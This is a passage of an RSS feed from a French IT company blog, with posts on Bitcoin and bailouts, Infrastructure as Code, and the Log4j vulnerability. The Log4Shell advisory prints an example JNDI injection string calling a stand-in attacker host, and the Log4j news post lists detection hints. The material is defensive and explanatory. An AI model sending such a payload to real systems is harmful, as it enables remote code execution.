d'investissement.</p><p><br></p><div class="kg-card kg-button-card kg-align-center"><a href="#" class="kg-btn kg-btn-accent">3</a></div><p><br>Les agences de notation « notent » le titre de manière à ce qu'il soit certifié comme étant d'un niveau de risque spécifique, c'est-à-dire. « AAA » signifie très probablement que la dette sera remboursée. Considérez-le comme un pointage de crédit pour un produit d'investissement.</p><p><br></p><div class="kg-card kg-button-card kg-align-center"><a href="#" class="kg-btn kg-btn-accent">4-5</a></div><p><br>Les fonds de pension, les fonds spéculatifs et d'autres investisseurs investissent dans ces titres en fonction des notes fournies. En investissant, ils gagnent les paiements d'intérêts effectués par les emprunteurs qui sont transférés de la banque d'origine.</p><p><br></p><div class="kg-card kg-button-card kg-align-center"><a href="#" class="kg-btn kg-btn-accent">6</a></div><p><br>Les consommateurs sont directement touchés par les décisions de ces investisseurs en étant leurs clients, en contribuant à leurs fonds de pension, etc.</p><p><br></p><div class="kg-card kg-button-card kg-align-center"><a href="#" class="kg-btn kg-btn-accent">7-8</a></div><p><br>La banque d'investissement émettrice de ces titres souscrit une assurance pour se prémunir contre la défaillance de ces produits au cas où ils ne seraient pas en mesure de délivrer les rendements promis aux investisseurs. De plus, ce sont les mêmes géants de l'assurance qui vous offrent une assurance vie, médicale et voyage, entre autres.</p><hr><p>Le problème avec ce processus est qu'à chaque étape, les parties sont incitées à adopter un comportement trop risqué car elles sont payées en frais pour continuer à prêter malgré la qualité du produit sous-jacent. Les banques perçoivent des frais pour l'octroi de prêts, ce qui les incite à être plus indulgents avec leurs normes de prêt. Les banques d'investissement perçoivent des frais pour la mise en commun des hypothèques et l'offre de titres adossés à des hypothèques de marque privée aux investisseurs, ce qui conduit à vendre des produits qu'ils savent ne pas pouvoir offrir. Et les agences de notation de crédit profitent du maintien de l'activité de ceux dont elles notent les produits.</p><p>Au début des années 2000, les banques d'investissement ont vendu des instruments financiers complexes basés sur des dettes dont elles savaient qu'elles ne pouvaient pas être remboursées. Et lorsque les assureurs n'ont pas pu couvrir le montant massif des défauts de paiement, le gouvernement a jeté un gilet de sauvetage aux banques d'investissement et aux agences d'assurance sous la forme de renflouements parce que ces institutions financières étaient « trop grandes pour faire faillite ».</p><p>Il s'agit d'un exemple <strong><strong><em><em>très</em></em></strong></strong> simplifié pour illustrer l'une des nombreuses façons dont notre système financier au sens large est intrinsèquement en proie à un problème d'aléa moral. Les institutions financières sont toutes incitées à adopter des comportements à risque car elles n'ont pas à assumer seules les coûts d'une éventuelle défaillance du système. Lorsque les choses s'effondrent, le fardeau revient finalement aux consommateurs et aux contribuables.</p><p><br></p><h2 id="2-faire-confiance-aux-banques-centrales">2. Faire confiance aux banques centrales</h2><p>En plus des renflouements, les banques centrales du monde entier ont également utilisé la politique monétaire pour atténuer le ralentissement économique plus large qui devait résulter du comportement de recherche de risque de ces institutions financières. La politique monétaire englobe des mesures, telles que l'ajustement du taux de prêt entre les banques et le montant d'argent que chaque banque doit garder en réserve, que les banques centrales peuvent utiliser pour modifier essentiellement le montant de l'argent en circulation. La théorie derrière l'utilisation de la politique monétaire pour aider l'économie à faire face à l'impact des fluctuations financières malsaines liées aux marchés du crédit, du logement et des actions remonte à <a href="http://www.investopedia.com/terms/k/keynesianeconomics.asp?ref=insys.fr" rel="noopener ugc nofollow">John Keynes</a> dans les années 1930.</p><p>Encore une fois, l'intervention du gouvernement en ce qui concerne l'offre monétaire n'est pas nécessairement une mauvaise chose. On peut affirmer que sans augmenter l'offre monétaire après 2008, la Grande Récession aurait entraîné encore plus de troubles économiques et s'est transformée en une Grande Dépression 2.0. Cependant, il peut y avoir d'autres motivations pour augmenter l'offre monétaire au détriment des consommateurs. Par exemple, les gouvernements peuvent effectivement « imprimer » plus de devises pour aider à rembourser leur dette au lieu d'être plus conservateurs sur le plan budgétaire. Les États-Unis ont continué de relever le plafond de la dette, malgré un débat acharné, et en 2016, le ratio dette/PIB a atteint un niveau record de 106 %.</p><figure class="kg-card kg-image-card"><img src="https://insys.fr/content/images/2022/01/1_LgXgjsSsJW6yPSvSRFxfPg.png" class="kg-image" alt loading="lazy" width="1390" height="658" srcset="https://insys.fr/content/images/size/w600/2022/01/1_LgXgjsSsJW6yPSvSRFxfPg.png 600w, https://insys.fr/content/images/size/w1000/2022/01/1_LgXgjsSsJW6yPSvSRFxfPg.png 1000w, https://insys.fr/content/images/2022/01/1_LgXgjsSsJW6yPSvSRFxfPg.png 1390w" sizes="(min-width: 720px) 720px"></figure><p><br>À plus long terme, l'augmentation de l'argent en circulation comme solution à d'autres problèmes peut entraîner de graves conséquences économiques. Des pays comme l'Argentine et la Zambie ont été en proie à une hyperinflation qui a entraîné des pertes importantes de qualité de vie. De plus, c'est dans les endroits où les individus ne peuvent pas comp<em>ter sur la valeur de la monnaie de leur pays que Bitcoin a le plus de chances d'être utilisé comme moyen d'échange quotidien.</em></p><p><br></p><h2 id="passer-%C3%A0-un-syst%C3%A8me-de-tr%C3%A9sorerie-sans-confiance">Passer à un système de trésorerie sans confiance</h2><p>Intégré dans le bloc "<a href="https://wiki.bitcoinsv.io/index.php/Genesis_block?ref=insys.fr">Genesis</a>" de Bitcoin, il y avait un message qui disait : </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text">« <em>The Times 03/Jan/2009 Chancellor on brink of second bailout for banks </em>»</div></div><p></p><p>ce qui donne en Français: </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text">« Le chancelier du Times 03/Jan/2009 sur le point d'un deuxième renflouement pour les banques. »</div></div><p></p><p>Le message était le titre d'un article sur la couverture du journal "The Times" ce jour-là. Non seulement cela commémore le jour où le bloc a été généré, mais met en perspective la raison pour laquelle Bitcoin a été créé.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.thetimes03jan2009.com/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Bitcoin Genesis Block Newspaper - The Times 03 Jan 2009</div><div class="kg-bookmark-description">Bitcoin Genesis Block Newspaper crypto collectible showcase: The Times 03 Jan 2009, Chancellor on Brink of Second Bailout for Banks</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.thetimes03jan2009.com/favicon.ico" alt=""><span class="kg-bookmark-author">Genesis Block Newspaper - Copies of The Times Jan 3 2009</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.thetimes03jan2009.com/wp-content/uploads/2015/03/bitcoin_newspaper.jpg" alt=""></div></a></figure><p><br>Les Bitcoins ne sont pas émis par les gouvernements. La quantité de bitcoins en circulation augmente toutes les 10 minutes environ et atteindra finalement un plafond d'environ 21 millions de BTC. Les changements dans la quantité de bitcoins en circulation ne pourraient résulter que d'un consensus majoritaire entre les participants, et non de la parole des gouvernements individuels. En outre, vous pouvez stocker votre bitcoin pour vous-même et empêcher les banques de prendre la garde de vos fonds et d'agir en tant qu'intermédiaires puissants à la recherche de risques.</p><p>Nous sommes loin d'une réalité où les bitcoins sont utilisés de manière omniprésente comme moyen de paiement alternatif aux monnaies fiduciaires émises par les banques centrales. C'est pourtant l'idéal libertaire qui l'a inspiré. Pour l'instant, les bitcoins sont traités comme une classe d'actifs émergente.</p><h2 id="bonus"><br>Bonus</h2><p>Si l'histoire du Bitcoin vous intéresse et que vous voulez en apprendre plus sur l'idéologie derrière celui-ci, je vous invite à regarder cette très belle vidéo éditée par Arte, elle résume cet article de façon très simple :</p><!--kg-card-begin: html--><iframe width="100%" height="480px" src="https://www.youtube.com/embed/0ETcLj5jBy4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe><!--kg-card-end: html--> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Qu&#x27;est-ce qu&#x27;une infrastructure en tant que code - Infrastructure as Code (IaC) ? ]]></title>
                    <description><![CDATA[ L&#39;infrastructure en tant que code (IaC) est à la fois un principe et un ensemble d&#39;outils, une manière moderne de gérer l&#39;infrastructure en minimisant le travail manuel. ]]></description>
                    <link>https://insys.fr/blog/qu-est-ce-quune-infrastructure-en-tant-que-code-iac/</link>
                    <guid isPermaLink="false">61c34f1afe136100796e994f</guid>
                    <category><![CDATA[ DevOps ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Thu, 23 Dec 2021 08:30:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2021/12/IaC-banner.png" medium="image"/>
                    <content:encoded><![CDATA[ <p><em>L'infrastructure en tant que code (Infrastructure as Code - IaC) est à la fois un principe et un ensemble d'outils, une manière moderne de gérer l'infrastructure en minimisant le travail manuel.</em></p><p>Qu'est-ce qui vous vient à l'esprit lorsque vous entendez le terme infrastructure informatique ? On pourrait penser à une grande pièce avec plusieurs grosses machines, un réseau de câbles et de systèmes. C'était le scénario exact il y a quelques années, lorsque les serveurs occupaient des salles et des ressources dédiées à temps plein garantissent la disponibilité du serveur pour exécuter des applications critiques sans aucune interruption.</p><p>Au fil des années, nous avons assisté à un changement considérable dans la façon dont le backend est géré aujourd'hui. Merci au Cloud et au DevOps ! Alors que la technologie Cloud a transformé la façon dont l'infrastructure est gérée, DevOps a apporté des changements dans la façon dont elle est développée et déployée. Désormais, nous n'avons plus besoin d'une administration à temps plein de l'infrastructure et de plusieurs heures pour sa configuration.</p><p>DevOps a apporté de nombreux concepts, termes et processus qui contribuent à rendre le développement de logiciels efficace, sécurisé et plus rapide. Et comme nous le savons, l'infrastructure est un aspect crucial du développement logiciel. L'infrastructure en tant que code (IAC) est l'un de ces concepts qui a permis la révolution DevOps. Avec "Infrastructure as a Code", nous pouvons développer, déployer et gérer l'ensemble de l'infrastructure plus facilement.<br><br></p><h2 id="quest-ce-que-linfrastructure-en-tant-que-code">Qu'est-ce que l'infrastructure en tant que code ?</h2><p>Selon la définition de Microsoft, « L'infrastructure en tant que code est la gestion de l'infrastructure (réseaux, machines virtuelles, équilibreurs de charge et topologie de connexion) dans un modèle descriptif, utilisant le même contrôle de version que l'équipe DevOps utilise pour le code source ».</p><p>En termes simples, IAC est la pratique de gérer l'infrastructure à l'aide de code. Il utilise des fichiers lisibles par une machine pour configurer et gérer l'infrastructure informatique requise. Avec IAC, vous pouvez traiter votre infrastructure comme vous traitez n'importe quel autre code.<br><br></p><h2 id="besoin-dinfrastructure-en-tant-que-code-iac">Besoin d'infrastructure en tant que code (IAC)</h2><p>L'infrastructure en tant que code permet aux administrateurs système d'automatiser le processus d'installation et de configuration d'une machine virtuelle à l'aide de code. Il offre une procédure rapide et répétitive pour reproduire l'ensemble du flux de processus. Cela signifie qu'une fois que vous avez créé un environnement virtuel à l'aide d'un morceau de code pour développer une application, vous pouvez répéter le processus de création de cette machine virtuelle pour le déploiement en exécutant le même code.</p><p>IaC peut être considéré comme équivalent au script en termes d'automatisation des processus informatiques. Cependant, le problème avec les scripts est qu'ils sont souvent utilisés pour automatiser des étapes statiques sans offrir aucune flexibilité pour des actions complexes. Ce n'est pas le cas avec IaC car il vous donne la flexibilité du code dans un environnement de type script. IaC vous permet de savoir quel type d'infrastructure est configuré. Par conséquent, au lieu de configurer manuellement une batterie de serveurs, le code IaC le fait pour vous.<br><br></p><h2 id="comment-linfrastructure-en-tant-que-code-iac-permet-elle-de-meilleures-pratiques-devops">Comment l'infrastructure en tant que code (IaC) permet-elle de meilleures pratiques DevOps ?</h2><p>DevOps est la combinaison d'une équipe de développement et d'exploitation visant à réduire le temps de cycle et à assurer une livraison continue aux utilisateurs finaux. Non seulement cela, mais DevOps (déploiement accru) offre également plus d'opportunités pour améliorer l'application et apprendre des erreurs. L'infrastructure en tant que code utilise l'automatisation et la mise en œuvre de code pour configurer et supprimer un environnement spécifique, contrairement à la pratique traditionnelle qui impliquait la gestion manuelle des machines virtuelles par des humains. Cette automatisation raccourcit le temps de cycle, ce qui facilite la production et la livraison de plates-formes stables et testées aux applications hôtes.</p><p>Le contrôle de version est un autre DevOps populaire. Grâce à cela, des équipes importantes ou réparties peuvent travailler efficacement ensemble à l'aide d'un système standard. IaC rend l'environnement de développement transparent et clair dans le cadre du code, améliorant ainsi le contrôle de version. Cela libère le besoin de tout documenter pour que l'utilisateur final ou les développeurs sachent. De cette façon, IaC aide à produire des résultats plus faciles avec le suivi et la réplication des erreurs, ce qui permet un traitement plus rapide.</p><p>De plus, IaC stocke toutes les commandes de création d'environnement dans un référentiel permettant un redéploiement ou une restauration plus rapide vers l'instance précédente. Cela signifie que vous n'avez plus besoin de passer du temps à réparer un serveur. Tout ce que vous avez à faire est de consulter l'historique des versions pour restaurer un déploiement précédent ou de le redéployer avec une copie de travail.</p><p>Pour faire court et simple, les 4 meilleures pratiques de l'IaC incluent :</p><ul><li>Gérez l'infrastructure via le contrôle des sources pour offrir des pistes d'audit détaillées pour les modifications.</li><li>Tester l'infrastructure à la recherche de défauts ou d'erreurs à l'aide de tests unitaires, de tests d'intégration et de tests fonctionnels.</li><li>Autorisez la collaboration autour de la configuration et de l'approvisionnement de l'infrastructure.</li><li>Évitez la documentation écrite car le code lui-même documentera l'état de la machine.</li></ul><p>Il n'est pas possible de pratiquer l'Infrastructure en tant que code (IaC) dans les workflows DevOps sans utiliser d'outils. Voici quelques outils IaC courants mais puissants :</p><p></p><h3 id="azure-resource-manager-arm">Azure Resource Manager (ARM)</h3><p>Cet outil aide les utilisateurs à provisionner l'infrastructure et à gérer les dépendances en un cycle via des modèles ARM. Les ressources comprises par le modèle sont décrites de manière déclarative dans un fichier JSON. C'est-à-dire que vous pouvez déclarer plusieurs ressources Azure dans un seul modèle ARM pour configurer l'ensemble de l'environnement du projet. Le fait que les modèles ARM soient idempotents, le même modèle peut être réutilisé un nombre infini de fois produisant le même résultat à chaque fois. De plus, toutes les versions de votre modèle peuvent être surveillées visuellement à l'aide d'un tableau de bord VSTS.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://azure.microsoft.com/fr-fr/features/resource-manager/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Azure Resource Manager | Microsoft Azure</div><div class="kg-bookmark-description">Simplifiez la façon dont vous gérez les ressources de vos applications avec Azure Resource Manager. Déployez les ressources ensemble, catégorisez-les pour faciliter la facturation, puis activez le contrôle d’accès.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://azurecomcdn.azureedge.net/cvt-612a63f378981a9e46182484d36b4546cdc0ffb5470db44430eded4782598aba/images/icon/live-tile/azure-310x310.png" alt=""><span class="kg-bookmark-author">Microsoft Azure</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://azurecomcdn.azureedge.net/cvt-612a63f378981a9e46182484d36b4546cdc0ffb5470db44430eded4782598aba/images/shared/social/azure-icon-250x250.png" alt=""></div></a></figure><p><br></p><h3 id="aws-cloudformation">AWS CloudFormation</h3><p>L'outil permet aux utilisateurs de définir des modèles qui représentent des piles logicielles et de les déployer automatiquement dans des environnements cloud. Pour cela, les modèles utilisent un format lisible par l'homme, facile à comprendre et pouvant être utilisé pour vérifier le contrôle de version. Avec cet outil, les utilisateurs peuvent faire tourner automatiquement n'importe quoi, d'une machine EC2 à une application complexe utilisant plusieurs services AWS.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://aws.amazon.com/fr/cloudformation/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Provisionner Infrastructure As Code – AWS CloudFormation – Amazon Web Services</div><div class="kg-bookmark-description">AWS CloudFormation est un service d’infrastructure en tant que code (IaC) qui vous permet de modéliser, de provisionner et de gérer facilement les ressources AWS et tierces.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png" alt=""><span class="kg-bookmark-author">Amazon Web Services, Inc.</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png" alt=""></div></a></figure><p><br></p><h3 id="puppet">Puppet</h3><p>Cet outil permet aux utilisateurs de déployer d'énormes charges de travail cloud pouvant contenir plus de 20 000 nœuds Puppet. L'outil est idéal pour être utilisé dans plusieurs clouds publics, systèmes de cloud privé et environnements de cloud hybride. Il permet l'automatisation de l'infrastructure à l'aide d'une interface graphique et d'un langage spécifique au domaine (DSL).</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://puppet.com/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Powerful infrastructure automation and delivery | Puppet</div><div class="kg-bookmark-description">Puppet automates away the challenges, complexity, and risk of securing and running global hybrid and cloud-native infrastructure, so you can focus on delivering the next great thing.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://puppet.com/favicon.ico" alt=""><span class="kg-bookmark-author">Puppet Logo</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://media.webteam.puppet.com/uploads/2019/11/puppet-meta.png" alt=""></div></a></figure><p><br></p><h3 id="terraform">Terraform</h3><p>Cet outil peut être utilisé en combinaison avec d'autres outils comme Chef ou Puppet. Terraform utilise ses fichiers de configuration pour créer un plan de déploiement, qui explique comment adapter l'infrastructure actuelle pour atteindre l'état souhaité. La principale responsabilité de cet outil est de gérer l'ensemble de l'environnement, y compris le stockage, les machines et la mise en réseau, les configurations DNS et les fonctionnalités d'application à granularité fine.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.terraform.io/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Terraform by HashiCorp</div><div class="kg-bookmark-description">Terraform is an open-source infrastructure as code software tool that enables you to safely and predictably create, change, and improve infrastructure.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.terraform.io/favicon.ico" alt=""><span class="kg-bookmark-author">Terraform by HashiCorp</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.terraform.io/img/og-image.png" alt=""></div></a></figure><p><br></p><h2 id="avantages-de-linfrastructure-en-tant-que-code-iac">Avantages de l'infrastructure en tant que code (IaC)</h2><ul><li>Amélioration des performances du système avec une prévention des risques assurée</li><li>Livraison de logiciels à grande vitesse</li><li>Une gestion du changement plus sûre et efficace</li><li>Évolutivité</li><li>Améliore la satisfaction client.<br><br></li></ul><h2 id="conclusion">Conclusion</h2><p>L'infrastructure en tant que code (IaC) peut aider votre organisation à fournir des produits plus rapidement et avec plus d'efficacité en améliorant l'environnement de développement. Cependant, la configuration de l'environnement Infrastructure as Code (IaC) n'est pas facile. Vous aurez besoin des conseils de quelqu'un qui a de l'expérience dans l'utilisation de la pratique pour le développement de logiciels et INSYS peut vous aider dans ce domaine.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Log4j un nouveau vecteur d&#x27;attaque peut affecter les hôtes locaux sans accès à Internet ]]></title>
                    <description><![CDATA[ Les chercheurs découvrent que l&#39;accès à Internet n&#39;est peut-être pas nécessaire pour exploiter la vulnérabilité ]]></description>
                    <link>https://insys.fr/blog/le-nouveau-vecteur-dattaque-log4j-peut-affecter-les-hotes-locaux-sans-acces-a-internet/</link>
                    <guid isPermaLink="false">61bfd9e8b8db8600a4a62b38</guid>
                    <category><![CDATA[ Open Source ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Mon, 20 Dec 2021 11:30:04 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2021/12/log4j-hns3.jpg" medium="image"/>
                    <content:encoded><![CDATA[ <p><strong>Contexte</strong> : la semaine dernière, les organisations informatiques se sont efforcées de répondre <a href="https://insys.fr/blog/vulnerabilite-apache-log4j-une-menace-extremement-critique-qui-frappe-des-milliers-d-applications-comment-s-en-premunir/">à la vulnérabilité Log4j</a> affectant les systèmes du monde entier. Alors que les experts en sécurité ont continué à identifier des bogues supplémentaires dans l'utilitaire de journalisation, les administrateurs réseau ont travaillé sans relâche pour identifier et fermer tout accès potentiel qui pourrait permettre l'exploitation de la vulnérabilité. Malheureusement, un vecteur récemment découvert a prouvé que même des systèmes isolés sans connexion Internet peuvent être tout aussi vulnérables, ce qui complique davantage le problème déjà énorme.<br><br></p><p>Les chercheurs de <a href="https://www.blumira.com/?ref=insys.fr">Blumira</a> ont d'autres mauvaises nouvelles pour la communauté informatique qui lutte contre les failles de sécurité de Log4j. Alors que les résultats précédents indiquaient que les systèmes concernés nécessiteraient un certain type de réseau ou de connectivité Internet, la récente découverte de la société de sécurité affirme désormais que les services fonctionnant en tant qu'hôte local sans connexion externe peuvent également être exploités. La découverte a dirigé les chercheurs vers plusieurs autres cas d'utilisation décrivant des approches alternatives pour compromettre les actifs non corrigés exécutant Log4j.<br><br></p><p>Un <a href="https://www.blumira.com/analysis-log4shell-local-trigger/?ref=insys.fr">article technique de Blumira CTO</a>, Matthew Warner, décrit comment un acteur malveillant peut avoir un impact sur les machines locales vulnérables. Warner déclare que les WebSockets, qui sont des outils permettant une communication rapide et efficace entre les navigateurs Web et les applications Web, pourraient être utilisés pour fournir des charges utiles aux applications et serveurs vulnérables sans connectivité Internet. Ce vecteur d'attaque spécifique signifie que les actifs non connectés mais vulnérables pourraient être compromis simplement par un attaquant envoyant une requête malveillante à l'aide d'un WebSocket existant. Le message de Warner détaille les étapes spécifiques qu'un acteur malveillant prendrait pour lancer l'attaque basée sur WebSocket.<br><br></p><p>Le vecteur d'attaque nouvellement identifié entraînera un plus grand nombre d'actifs vulnérables dans des secteurs déjà fortement touchés. Selon Check Point Software, plus de 50 % de toutes les organisations gouvernementales, militaires, financières, de distribution, de FAI et d'éducation sont actuellement affectées par la vulnérabilité Log4j. </p><figure class="kg-card kg-image-card kg-width-full"><img src="https://insys.fr/content/images/2021/12/2021-12-19-image-j_1100.webp" class="kg-image" alt loading="lazy" width="1100" height="707" srcset="https://insys.fr/content/images/size/w600/2021/12/2021-12-19-image-j_1100.webp 600w, https://insys.fr/content/images/size/w1000/2021/12/2021-12-19-image-j_1100.webp 1000w, https://insys.fr/content/images/2021/12/2021-12-19-image-j_1100.webp 1100w"></figure><p><br>Warner note qu'il existe des méthodes disponibles que les organisations peuvent utiliser pour détecter les vulnérabilités Log4j existantes : </p><ul><li>Exécutez <a href="https://github.com/N-able/ScriptsAndAutomationPolicies/blob/master/Vulnerability%20-%20CVE-2021-44228%20(Log4j)/get-log4jrcevulnerability.ps1?ref=insys.fr">Windows PoSh</a> ou <a href="https://github.com/hillu/local-log4j-vuln-scanner/releases?ref=insys.fr">des scripts multiplateformes</a> conçus pour identifier où Log4j est utilisé dans les environnements locaux </li><li>Recherchez toute instance de ".*/java.exe" utilisée comme processus parent pour "cmd.exe/powershell.exe" </li><li>Assurez-vous que votre organisation est configurée pour détecter la présence de Cobalt Strike, TrickBot et des outils d'attaque courants associés </li></ul><p>Les organisations concernées peuvent mettre à jour leurs instances de Log4j vers verss <a href="https://logging.apache.org/log4j/2.x/download.html?ref=insys.fr">la dernière version de Log4j</a> (Log4j 2.17 actuellement) pour atténuer la vulnérabilité de l'outil. Cela inclut toute organisation qui peut avoir appliqué la correction précédente, la version 2.15 et 2.16, qui s'est avérée plus tard inclure son propre ensemble de vulnérabilités associées.</p><p><br></p><p>Voir <a href="https://insys.fr/blog/vulnerabilite-apache-log4j-une-menace-extremement-critique-qui-frappe-des-milliers-d-applications-comment-s-en-premunir/">notre précédent article sur Log4j</a></p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Vulnérabilité Apache Log4J, une menace extrêmement critique qui frappe des milliers d&#x27;applications ! Comment s&#x27;en prémunir ? ]]></title>
                    <description><![CDATA[ Vulnérabilité Apache Log4j, un package de journalisation largement utilisé pour Java a été trouvée. La vulnérabilité, qui peut permettre à un attaquant d&#39;exécuter du code arbitraire en envoyant des messages de journal spécialement conçus, a été identifiée comme CVE-2021-44228 et nommée Log4Shell. ]]></description>
                    <link>https://insys.fr/blog/vulnerabilite-apache-log4j-une-menace-extremement-critique-qui-frappe-des-milliers-d-applications-comment-s-en-premunir/</link>
                    <guid isPermaLink="false">61b8cfecb8db8600a4a6290d</guid>
                    <category><![CDATA[ Open Source ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Tue, 14 Dec 2021 20:20:14 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2021/12/Apache_Log4j_Logo-1.png" medium="image"/>
                    <content:encoded><![CDATA[ <p>Rendu publique le 9 décembre la faille Apache Log4j (également connue sous le nom de "Log4Shell") est vulnérabilité (CVE-2021-44228). Son existence a été en réalité signalé à Apache le 29 novembre, par un salarié d'Alibaba Cloud (une société chinoise dont les activités sont similaire à AWS - Amazon Web Services). </p><p>Mais dès le 2 décembre, des acteurs malveillants auraient entrepris de l’exploiter, à en croire <a href="https://talosintelligence.com/?ref=insys.fr">Talos</a> (une filiale du groupe Cisco axée sur la cyber sécurité). Pour Cloudflare, la première preuve d’exploitation remonterait à la veille, le 1<sup>er</sup> décembre. Mais aucun éditeur ne rapporte d’exploitation massive de la faille avant sa divulgation.<br><br></p><h2 id="quest-ce-que-log4j-%C3%A0-quoi-sert-il-et-pourquoi-est-il-si-important">Qu'est-ce que Log4j, à quoi sert-il et pourquoi est-il si important ?</h2><p>Log4j c'est quoi ? Log4j est une bibliothèque de journalisation basée sur Java que "Ceki Gulcu" a développée, puis transférée à Apache Software Foundation et produite par ASF.</p><p>Log4j est activement impliqué dans de nombreuses applications Java en créant une journalisation optionnelle basée sur les niveaux. Considérant que le nombre d'appareils utilisant Java dans le monde se chiffre en milliards, il n'est pas surprenant que Log4j apparaisse dans de nombreux environnements.<br><br></p><h2 id="quelle-est-la-gravit%C3%A9-dune-vuln%C3%A9rabilit%C3%A9-d%C3%A9tect%C3%A9e-dans-log4j">Quelle est la gravité d'une vulnérabilité détectée dans Log4j ?</h2><p>Bien que la vulnérabilité Log4Shell, détectée par "Chen Zhaojun" de l'équipe de sécurité d'Alibaba Cloud, ne semble pas encore entièrement comprise, elle ressemble à une vulnérabilité qui sera le plus discutée dans les années à venir. Il est si critique qu'il amène différentes entreprises à subir des failles de sécurité à un moment inattendu.<br></p><p>Nous rappeler la vulnérabilité d'Equifax pourrait être bon pour nous rafraîchir la mémoire. La vulnérabilité qui a causé la violation de données d'Equifax en 2017 était similaire à l'exposition Log4j qui est sortie aujourd'hui, mais il s'agissait d'une vulnérabilité très innocente.</p><p>Les autorités ont déterminé que le niveau de criticité de la vulnérabilité (CVSS) était de 10 sur 10. Le score CVSS élevé indique que la vulnérabilité doit être corrigée immédiatement. </p><p>Comment savoir si vous êtes affecté par cette vulnérabilité ? La réponse est :</p><ul><li><strong>Si vous utilisez des versions de log4j de 2.0 à 2.14.1, vous êtes affecté par cette vulnérabilité</strong>, donc corrigez là maintenant !<br></li><li><strong>Si vous utilisez Log4j 1.x</strong>, vous n'êtes concerné par cette vulnérabilité que si vous utilisez "JMS Appenders".<br><br></li></ul><h2 id="comment-%C3%A7a-marche">Comment ça marche?</h2><p>La façon dont le processeur log4j traite les messages de journal est la cause première de la vulnérabilité. Un attaquant peut exécuter des codes à distance en envoyant un message personnalisé qui peut inclure du code malveillant comme le suivant.</p><pre><code>${jndi:ldap://evil.xa/x}</code></pre><p><br>Cette insertion de code peut par exemple entraîner le chargement d'une classe de code externe ou la consultation d'un message et l'exécution de ce code.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://insys.fr/content/images/2021/12/log4j_attack.png" class="kg-image" alt loading="lazy" width="1204" height="814" srcset="https://insys.fr/content/images/size/w600/2021/12/log4j_attack.png 600w, https://insys.fr/content/images/size/w1000/2021/12/log4j_attack.png 1000w, https://insys.fr/content/images/2021/12/log4j_attack.png 1204w"></figure><h2 id="quels-produits-et-syst%C3%A8mes-que-vous-utilisez-peuvent-%C3%AAtre-affect%C3%A9s-par-cette-vuln%C3%A9rabilit%C3%A9"><br>Quels produits et systèmes que vous utilisez peuvent être affectés par cette vulnérabilité ?</h2><p>Il est impossible de dire directement si une application utilise Log4j en la regardant de l'extérieur. Il semble que certains éditeurs aient commencé à répertorier les services et logiciels qui utilisent Log4j à ce sujet. Nous partageons les plus importants d'entre eux dans une liste ci-dessous.</p><p>En résumé, si vous avez une application qui utilise Java, Log4j est également utilisé. Par conséquent, vous devez vérifier toutes les applications Java et appliquer les patches/mitigations nécessaires.</p><h3 id="recherche-de-log4j-avec-des-outils-open-source">Recherche de Log4j avec des outils open source</h3><p>Comment tester la faille et comment la rechercher ? Il existe deux outils open-source dirigés par Anchor qui peuvent analyser de nombreux formats de dépendances empaquetées, identifier leur existence et signaler s'ils contiennent des vulnérabilités. Dans ce cas, ce que nous voulons, c'est pouvoir vérifier les fichiers JAR, en particulier les couches imbriquées de fichiers JAR.</p><p>Syft génère une nomenclature logicielle (SBOM) et Grape est un scanner de vulnérabilités. Ces deux outils peuvent inspecter plusieurs couches imbriquées d'archives JAR pour découvrir et identifier les versions de Log4j.</p><p>Quelques services/fabricants affectés par la vulnérabilité de Log4j :</p><ul><li>Apple</li><li>Steam</li><li>Twitter</li><li>Baidu</li><li>Tesla</li><li>Amazon</li><li>Cisco, F5</li><li>Citrix</li><li>Carbon Black</li><li>Imperva</li><li>Jenkins</li><li>McAfee</li><li>Oracle</li><li>Webex</li><li>Palo-Alto Networks</li><li>Pulse Secure</li></ul><p>Produits identifiés comme étant affectés par la vulnérabilité de Log4j :</p><ul><li>La plupart des applications qui utilisent Java dans leur infrastructure</li><li>Apache Struts</li><li>Apache Struts2</li><li>Apache Tomcat</li><li>Apache Spark</li><li>Apache Solr</li><li>Apache Druid</li><li>Apache Flink</li><li>ElasticSearch</li><li>flume</li><li>Apache 